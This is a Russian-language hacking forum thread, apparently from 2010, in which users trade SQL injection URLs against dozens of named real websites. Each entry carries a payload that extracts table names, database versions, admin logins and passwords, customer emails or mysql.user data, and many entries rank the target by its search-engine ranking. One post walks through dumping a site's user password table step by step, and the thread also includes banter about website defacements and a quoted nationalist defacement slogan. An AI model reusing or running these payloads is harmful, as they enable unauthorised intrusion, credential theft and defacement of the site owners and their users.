http://www.kiddypages.ru/index.php?item_full&t=import&id=-117+UnIon+selECt+1,group_concat%28table_name%29,3, 4,5,6,7,8,9,10,11,12,13,14,15+from+information_sch ema.tables+where+table_Schema=0x6b6964647970616765 73+--+
ТИЦ : 110
Code:
http://www.mardesombras.com/mds/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 2
Code:
http://www.skflamurtari.com/flotakuqezi/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 3
Code:
http://www.mma-france.net/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 3
Code:
http://www.portalmotociclista.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
Code:
http://www.handi-occasion.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.dama.in.rs/old_version/htdocs/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 2
Code:
http://www.tingis.be/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 3
Code:
http://www.palermoincosplay.net/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 0
Code:
http://www.mzonline.po.gs/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
Code:
http://www.bafraresim.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.cuisine-marocaine.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.vranjeportal.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.onodenje.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.festacirera.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 3
Code:
http://liveab1.de/xoops/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.linerider.fr/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 3
Code:
http://www.giovaniprofessionisti.it/it//modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 3
Code:
http://www.arabecontact.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 5
Code:
http://www.sintasa-se.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 2
Code:
http://www.portalmotociclista.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 1
Code:
http://www.cuisine-marocaine.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.allnight.it/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 2
http://www.opc4all.de/intern/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
Code:
http://www.handi-occasion.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.onodenje.com/vip/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 4
Code:
http://www.sintasa-se.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(version(),floor(rand(0)* 2)))
тИЦ — 10
PR — 2
Kusto said:
http://www.renewal-avto.ru/info.php?id=11+and+1=0+union+select+1,2,3,4,concat (login,char(58),password),6,7+from+avtorw.users+--+
и админко http://www.renewal-avto.ru/admin
вы мне обьясните НАХРЕНА БЫЛО ДЕФЕЙСИТЬ сайт да еще и со ссылкой на ачат???
Kusto said:
вы мне обьясните
НАХРЕНА БЫЛО ДЕФЕЙСИТЬ сайт да еще и со ссылкой на ачат???
эт же круто писюн +10см
хотя я сам уже 5 сайтоф дефнул(за всё время),только своих, и то от злости=)
Kusto said:
вы мне обьясните
НАХРЕНА БЫЛО ДЕФЕЙСИТЬ сайт да еще и со ссылкой на ачат???
Code:
We are from Azerbaijan. Fuck you armenia!
боюсь они всю жизнь остануться такими же ламерами и смешными
99% дефейсер - k2b1~ aka LokbatanLi, которого забанили за неодекватное поведение и за дефейсы сайтов которые другие раскрутили
з.ы. не разазлите меня со своими глупо национальными дефейсами, а то плохо закончиться!
*uNkN0Wn*
05.09.2010, 14:24
http://www.protexin.com/animal/products.php?id=-6+union+select+group_concat(d_email,0x3c62723e)+fr om+customer_orders+--+
PR - 4
http://www.sammygs.com/products.php?id=-6+union+select+1,group_concat(username,char(58),pa ssword,char(58),0x3c62723e),3,4,5,6,7,8+from+admin +--+
PR - 3
http://www.nbjm-sprayer.com/products.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,version(),18,19,20,21,22+--+
PR - 4
http://www.mahindraaustralia.com/products.php?act=viewSeries&id=-6+union+select+1,version(),3,4,5,6,7,8,9,10+--+
PR - 4
http://www.regalrentals.co.za/products.php?id=-6+union+select+1,2,group_concat(username,char(58), passwd)+from+admin+--+
PR - 2
http://vision-egy.net/products.php?id=-6+union+select+1,version(),3+--+
И вывести нечего
http://www.everyway-medical.com/products.php?id=6=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version( ),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+
PR - 3
Konqi said:
Code:
We are from Azerbaijan. Fuck you armenia!
боюсь они всю жизнь остануться такими же ламерами и смешными
99% дефейсер - k2b1~ aka LokbatanLi, которого забанили за неодекватное поведение и за дефейсы сайтов которые другие раскрутили
з.ы. не разазлите меня со своими глупо национальными дефейсами, а то плохо закончиться!
ну а теперь в продолжении темы дефейса, заметил что при переходе на главную задефейсенного сайта данные грузятся с http://trytobe.us/
Поэтому могу сказать- на дефейсь свой сайт
Code:
http://trytobe.us/account.php?id=-1+union+select+1,concat(login,char(58),user_passwo rd),3,4,5,6+from+users+--+
http://www.unico94.ru/review/obzor_nalogi/?id=566+and+1=0+union+select+1,version()+--+
ТИЦ : 130
Так же есть доступ к mysql.user ,но нету прав на запись
http://xk5.com.ua/adv.php?id_sgroop=885+and+1=0+union+select+group_c oncat(schema_name)+from+information_schema.schemat a+--+
ТИЦ : 30 PR: 4
http://www.i-tilzit.ru/?id=26+and+1=0+union+select+1,group_concat(table_n ame),3+from+information_schema.tables+where+table_ schema=0x76657465725f6d61696e+--+
ТИЦ : 10 PR: 3
http://www.gorodetc.ru/business/index.php?id=12+union+select+1,group_concat(table_ name)+from+information_schema.tables+where+table_s chema=0x7975726963685f677264+--+
ТИЦ : 40 PR: 2
http://www.ibg-property.com/category.php?id=-4+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+--+
http://www.dipris.com/visual.php?article_id=186+and+1=0+union+select+1,2 ,version%28%29,4,5,6,7,8,9+--+
ТИЦ :10
есть доступ к mysql.user ,но нету прав на запись
http://www.songsuda.com/car_details.php?id=2+UnIon+selECt+1,2,3,4,group_co ncat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46+from+informati on_schema.tables+where+table_schema=0x736f6e677375 64615f646220--+
PR: 2
http://www.krasydom.ru/index.php?l_id=293+and+1=0+union+select+1,2,3,grou p_concat(schema_name),5,6+from+information_schema. schemata--+
ТИЦ : 40
Много схем к разным сайтам
http://www.eowave.com/products.php?prod=9+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18+from+customer
http://www.pogoda.v.ua/index.php?id=13+and+1=0+union+select+1,version(),3 ,4,5+--+
ТИЦ : 10
http://www.rfn.spb.ru/index.php?cat=contacts&page=branch&branch=3+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10 ,11,12,13,14+--+
ТИЦ : 110 PR: 3
http://www.volga-rm.ru/catalogue/?catalogue&group=00000002202+union+select+1,2,3,group_concat( table_name),5,6,7,8,9+from+information_schema.tabl es+where+table_schema=0x623132333035--+
ТИЦ : 10
Terminolog
05.09.2010, 19:50
Code:
http://www.kinoglaz.fr/u_fiche_film.php?num=2010-999.9+union+select+1,2,3,4,5--
ТИЦ 60
PR 4
Code:
http://www.bloody-disgusting.com/platinumdunes/entry.php?id=9-999.9+union+select+1,2,3,4,5,6--
ТИЦ 100
PR 5
http://www.modularsquare.com/products.php?prod=-158+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27
daniel_1024
05.09.2010, 20:41
шоп:
Code:
http://www.chemicalshop.biz/view.php?id=4509+and+1=0+union+select+0,1,version( ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Version: 4.0.27-max-log
Database: db122374831
User: dbo122374831@212.227.127.45
Code:
http://ovp.site50.net/ovp/gallery.php?id=55809+and+1=0+union+select+0,1,2,3, version(),5,6,7,8,9,10,11,12
Version: 5.0.91-community
Database: a6123114_ovp2
User: a6123114_ovp2@10.50.0.60
Code:
http://www.smachno.biz/index.php?id=25509+and+1=0+union+select+0,1,2,3,4, 5,6,7,version(),9,10
Version: 5.1.42
Database: smachno_smachno
User: smachno_smachno@localhost
Code:
http://www.bystock.biz/index.php?id=2409+and+1=0+union+select+0,version() ,2,3,4,5,6
Version: 5.0.89-community
Database: vulkan_stock
User: vulkan_stock@localhost
PR4
Code:
http://www.tierra-inca.com/album/photos/view.php?lg=it&id=4509+and+1=0+union+select+1,2,3,4,5,6,7,8,9,ver sion(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39+--+
Code:
http://vision-egy.net/products.php?id=6+and+1=0+union+select+1,version() ,3
http://www.rotary7040.com/clubsite.php?id=4586+and+1=0+UnIon+selECt+1,2,grou p_concat(,user(),version()),4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+
PR: 4
http://www.kkfi.org/program.php?id=63+group+by+24+--+
daniel_1024
05.09.2010, 21:01
BENCHMARK
psa.org.auVersion: 5.0.32-Debian_7etch10-log
Database: psa_www
User: psa_www_ro@localhost
выводим все таблицы:
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(25,@o :=CONCAT(@o,0x0d0a,(SELECT @i:=table_name from information_schema.tables WHERE table_schema=0x7073615f777777 and table_name>@i order by table_name LIMIT 1))),@o),0x696e6a64617461656e64),4--
затем колонки:
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(6,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=column_name) from information_schema.columns WHERE table_schema=0x7073615f777777 and table_name = 0x55736572 and column_name>@i order by column_name LIMIT 1))),@o),0x696e6a64617461656e64),4--
и дампим данные:
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(55,@o :=CONCAT(@o,0x0d0a,(SELECT concat(Password,0x3a,@i:=ID) from psa_www.User WHERE ID>@i order by ID LIMIT 1))),@o),0x696e6a64617461656e64),4--
всё, 1300 страница))
Version(): 5.0.82sp1
Database(): mindsmack
User(): bg_mindsmack
Code:
http://www.ortega.com/products/products.php?id=6+and+1=0+union+select+1,2,3,4,5,g roup_concat(table_name),7,8,9,10+from+information_ schema.tables+--+
PR5
http://www.wptgroup.com/products.php?id=4+union+select+1,2,3,4,5,6,7,8,9+f rom+msysaccessobjects
http://www.riddim.de/new.php?id=-330+union+select+1,2,3,4,concat(username,char(58), password),6,7,8,9,10,11,12,13,14,15,16,17,18+from+ joomla.jos_users+--+
http://nakano.no-ip.org/lege/diary-new.php?id=-2138+union+select+1,2,3,4,5,6,concat(user,char(58) ,password),8,9+from+mysql.user+--+
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot